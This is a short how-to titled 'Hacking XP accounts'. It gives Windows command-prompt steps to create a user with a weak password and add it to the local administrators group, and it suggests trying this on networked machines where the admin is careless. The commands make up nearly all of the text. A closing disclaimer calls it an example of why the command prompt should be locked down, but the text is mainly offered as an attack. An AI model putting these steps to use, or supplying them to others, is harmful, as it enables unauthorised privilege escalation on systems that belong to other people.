
Hacking XP accounts

Step One: First, open Command Prompt (either; Start->Run->Type cmd.exe->OK OR; Double-Click C:\Windows\System32\cmd.exe

Step Two: Create an account, if you do not wish to create a new account, ignore this step. Type the following into the black box that appears (command prompt)

net user /add

Example: net user max 123456 /add

This will create a password protected account. The username will be max The password will be 123456

Step Three: Find all of the user groups that are available on the network

net localgroup

This will bring up a list like this *Administrators *Debugger Users *Guests *HelpServicesGroup *Users The command completed successfully. (can be different according to different systems)

Step Four: Input the following into Command Prompt

net localgroup /add


net localgroup administrators max /add

This would add the username “max” join the group “administrators” and have all privileges related to that group.

This will work on local machines. and if you are lucky enough and the admin is not very good on what he is doing you can create your own admin account in an networked environment as well :) :) but if the cmd command prompt is restricted or a manual access rights are placed then no way to make this work.. You will probably get into trouble if you get caught doing this.. I have only provided this as an example of what you can do with command prompt and thus why it should always be disabled on limited accounts, I am not responsible for anything you do with this. also note that this only work at home or in an unmanaged network.

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